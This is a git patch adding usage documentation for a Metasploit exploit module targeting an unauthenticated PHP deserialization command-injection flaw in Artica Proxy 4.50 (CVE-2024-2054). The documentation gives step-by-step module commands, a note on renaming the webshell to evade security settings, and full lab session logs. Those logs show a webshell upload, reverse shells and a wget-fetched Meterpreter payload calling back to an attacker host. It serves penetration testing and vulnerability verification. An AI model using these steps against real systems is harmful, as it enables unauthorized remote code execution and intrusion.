From 5dd75e174b42cf6fb49dff30d79250ec8a38418d Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Fri, 15 Mar 2024 18:27:59 +0000 Subject: [PATCH] second release module and documentation --- .../artica_proxy_unauth_rce_cve_2024_2054.md | 209 ++++++++++++++++++ .../artica_proxy_unauth_rce_cve_2024_2054.rb | 4 +- 2 files changed, 211 insertions(+), 2 deletions(-) create mode 100644 documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md diff --git a/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md b/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md new file mode 100644 index 0000000000..7f1bfc71e9 --- /dev/null +++ b/documentation/modules/exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054.md @@ -0,0 +1,209 @@ +## Vulnerable Application + +A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows remote attackers +to run arbitrary commands via unauthenticated HTTP request. +The Artica Proxy administrative web application will de-serialize arbitrary PHP objects +supplied by unauthenticated users and subsequently enable code execution as the `www-data` user. + +## Installation steps to install Artica Proxy appliance +* Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform. +* Here are the installation instructions for [VirtualBox on MacOS](https://tecadmin.net/how-to-install-virtualbox-on-macos/). +* Download the Artica Proxy iso image from [here](https://sourceforge.net/projects/artica-squid/files/ISO/). +* Install the iso image in your virtualization engine. +* When installed, configure the VM appliance to your needs using the menu options. +* Boot up the VM and should be able to access the Artica appliance. +* Either thru the console, `ssh` on port `22` or via the `webui` via `https://your_articaproxy_ip:9000`. + +You are now ready to test the module. + +## Verification Steps + +- [ ] Start `msfconsole` +- [ ] `use exploit/linux/http//artica_proxy_unauth_rce_cve_2024_2054` +- [ ] `set rhosts ` +- [ ] `set rport ` +- [ ] `set webshell cuckoo` +- [ ] `set target <0=PHP, 1=Unix Command, 2=Linux Dropper>` +- [ ] `exploit` +- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings + +## Options + +### WEBSHELL +You can use this option to set the filename without extension of the webshell. +This is handy if you want to test the webshell upload and execution with different file names. +to bypass any security settings on the Web and PHP server. + +### COMMAND +This option provides the user to choose the PHP underlying shell command function to be used for execution. +The choices are `system()`, `passthru()`, `shell_exec()` and `exec()` and it defaults to `passthru()`. +This option is only available when the target selected is either Unix Command or Linux Dropper. +For the native PHP target, by default the `eval()` function will be used for native PHP code execution. + +## Scenarios + +```shell +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > info + + Name: Artica Proxy Unauthenticated PHP Deserialization Vulnerability + Module: exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054 + Platform: PHP, Unix, Linux + Arch: php, cmd, x64, x86 + Privileged: No + License: Metasploit Framework License (BSD) + Rank: Excellent + Disclosed: 2024-03-05 + +Provided by: + h00die-gr3y + Jaggar Henry of KoreLogic Inc. + +Module side effects: + ioc-in-logs + artifacts-on-disk + +Module stability: + crash-safe + +Module reliability: + repeatable-session + +Available targets: + Id Name + -- ---- + => 0 PHP + 1 Unix Command + 2 Linux Dropper + +Check supported: + Yes + +Basic options: + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/ba + sics/using-metasploit.html + RPORT 9000 yes The target port (TCP) + SSL true no Negotiate SSL/TLS for outgoing connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + TARGETURI / yes The Artica Proxy endpoint URL + URIPATH no The URI to use for this exploit (default is random) + VHOST no HTTP server virtual host + WEBSHELL no Set webshell name without extension. Name will be randomly generated if left un + set. + + + When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on t + he local machine or 0.0.0.0 to listen on all addresses. + SRVPORT 1981 yes The local port to listen on. + + + When TARGET is not 0: + + Name Current Setting Required Description + ---- --------------- -------- ----------- + COMMAND passthru yes Use PHP command function (Accepted: passthru, shell_exec, system, exec) + +Payload information: + +Description: + A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows + remote attackers to run arbitrary commands via unauthenticated HTTP request. + The Artica Proxy administrative web application will deserialize arbitrary PHP objects + supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. + +References: + https://nvd.nist.gov/vuln/detail/CVE-2024-2054 + https://attackerkb.com/topics/q1JUcEJjXZ/cve-2024-2054 + https://packetstormsecurity.com/files/177482 + + +View the full module info with the info -d command. +``` + +### Target 0 - PHP native `php/meterpreter/reverse_tcp` session +```shell +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set webshell cuckoo +webshell => cuckoo +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 0 +target => 0 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set rhosts 192.168.201.4 +rhosts => 192.168.201.4 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set lhost 192.168.201.8 +lhost => 192.168.201.8 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit + +[*] Started reverse TCP handler on 192.168.201.8:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Checking if 192.168.201.4:9000 can be exploited. +[+] The target is vulnerable. Artica version: 4.50 +[*] Executing PHP for php/meterpreter/reverse_tcp +[*] Sending stage (39927 bytes) to 192.168.201.4 +[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php +[*] Meterpreter session 15 opened (192.168.201.8:4444 -> 192.168.201.4:33986) at 2024-03-15 17:46:04 +0000 + +meterpreter > sysinfo +Computer : artica-applianc +OS : Linux artica-applianc 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64 +Meterpreter : php/linux +meterpreter > getuid +Server username: www-data +meterpreter > +``` +### Target 1 - Unix Command `cmd/unix/reverse_bash` session +```shell +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 1 +target => 1 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit + +[*] Started reverse TCP handler on 192.168.201.8:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Checking if 192.168.201.4:9000 can be exploited. +[+] The target is vulnerable. Artica version: 4.50 +[*] Executing Unix Command for cmd/unix/reverse_bash +[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php +[*] Command shell session 16 opened (192.168.201.8:4444 -> 192.168.201.4:46286) at 2024-03-15 17:48:40 +0000 + +uname -a +Linux artica-applianc 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64 GNU/Linux +id +uid=33(www-data) gid=33(www-data) groups=33(www-data) +``` +### Target 2 - Linux Dropper `linux/x64/meterpreter/reverse_tcp` session +```shell +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 2 +target => 2 +msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit + +[*] Started reverse TCP handler on 192.168.201.8:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Checking if 192.168.201.4:9000 can be exploited. +[+] The target is vulnerable. Artica version: 4.50 +[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp +[*] Using URL: http://192.168.201.8:1981/U835crbue3yBo +[*] Client 192.168.201.4 (Wget/1.20.1 (linux-gnu)) requested /U835crbue3yBo +[*] Sending payload to 192.168.201.4 (Wget/1.20.1 (linux-gnu)) +[*] Sending stage (3045380 bytes) to 192.168.201.4 +[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php +[*] Meterpreter session 17 opened (192.168.201.8:4444 -> 192.168.201.4:35246) at 2024-03-15 17:50:04 +0000 +[*] Command Stager progress - 100.00% done (119/119 bytes) +[*] Server stopped. + +meterpreter > sysinfo +Computer : artica-applianc.domain.tld +OS : Debian 10.13 (Linux 4.19.0-24-amd64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > getuid +Server username: www-data +meterpreter > +``` + +## Limitations +No limitations. diff --git a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb index bfb96b85ea..3a54dd70ed 100644 --- a/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb +++ b/modules/exploits/linux/http/artica_proxy_unauth_rce_cve_2024_2054.rb @@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ ['CVE', '2024-2054'], - ['URL', 'https://attackerkb.com/topics/xxxxx/cve-2024-2054'], + ['URL', 'https://attackerkb.com/topics/q1JUcEJjXZ/cve-2024-2054'], ['PACKETSTORM', '177482'] ], 'DisclosureDate' => '2024-03-05', @@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote ) register_options([ OptString.new('TARGETURI', [ true, 'The Artica Proxy endpoint URL', '/' ]), - OptString.new('WEBSHELL', [false, 'Web shell name without extension. Name will be randomly generated if left unset.', nil]), + OptString.new('WEBSHELL', [false, 'Set webshell name without extension. Name will be randomly generated if left unset.', nil]), OptEnum.new('COMMAND', [true, 'Use PHP command function', 'passthru', %w[passthru shell_exec system exec]], conditions: %w[TARGET != 0]) ])